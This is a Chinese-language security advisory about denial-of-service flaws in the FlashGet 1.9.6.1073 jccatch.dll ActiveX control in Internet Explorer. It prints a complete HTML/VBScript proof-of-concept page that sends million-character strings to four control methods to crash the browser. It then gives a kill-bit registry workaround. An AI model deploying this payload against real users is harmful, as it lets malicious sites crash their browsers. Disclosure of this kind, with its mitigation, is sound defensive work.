FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞_安全中国

受影响的系统
FlashGet 1.9.6.1073

描述：

FlashGet　－全球最多人使用的下载工具。可支持多种资源格式。
IE浏览器在以畸形参数调用FlashGet的jccatch.dll ActiveX控件时存在漏洞，恶意网站可能利用此漏洞导致用户浏览器崩溃。
如果用户受骗打开了恶意的WEB页面的话，就会触发这个漏洞，导致浏览器崩溃。

测试方法

1. -----------------------------------------------------------------------------<br>
2. FlashGet jccatch.dll multiple methods Denial of Service<br>
3. site: http://1v1.name<br>
4. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6<br>
5. -----------------------------------------------------------------------------<br>
6. <object classid=’clsid:FB5DA724-162B-11D3-8B9B-AA70B4B0B524’ id=’FlashGet’></object>
7. <select name="Pucca">
8. <option value = "AddUrl">AddUrl</option>
9. <option value = "AddFgUrl">AddFgUrl</option>
10. <option value = "IsUrlExist">IsUrlExist</option>
11. <option value = "Initialize">Initialize</option>
12. </select>
13. <input language=VBScript onclick=tryMe() type=button value="测试">
14. <script language=’vbscript’>
15. Sub tryMe
16. on error resume next
17. if Pucca.value="AddUrl" then
18. argCount = 3
19. arg1="defaultV"
20. arg2="defaultV"
21. arg3=String(1000000, "A")
22. FlashGet.AddUrl arg1 ,arg2 ,arg3
23. elseif Pucca.value="AddFgUrl" then
24. argCount = 3
25. arg1="defaultV"
26. arg2="defaultV"
27. arg3=String(1000000, "A")
28. FlashGet.AddFgUrl arg1 ,arg2 ,arg3
29. elseif Pucca.value="IsUrlExist" then
30. argCount = 1
31. arg1=String(1000000, "A")
32. FlashGet.IsUrlExist arg1
33. elseif Pucca.value = "Initialize" then
34. argCount = 2
35. arg1="defaultV"
36. arg2=String(1000000, "A")
37. FlashGet.Initialize arg1 ,arg2
38. end if
39. End Sub
40. </script>
临时解决方法：

在IE中禁用 FlashGet jccatch.dll　ActiveX控件，为以下CLSID设置kill bit：
{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}

或将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]
"Compatibility Flags"=dword:00000400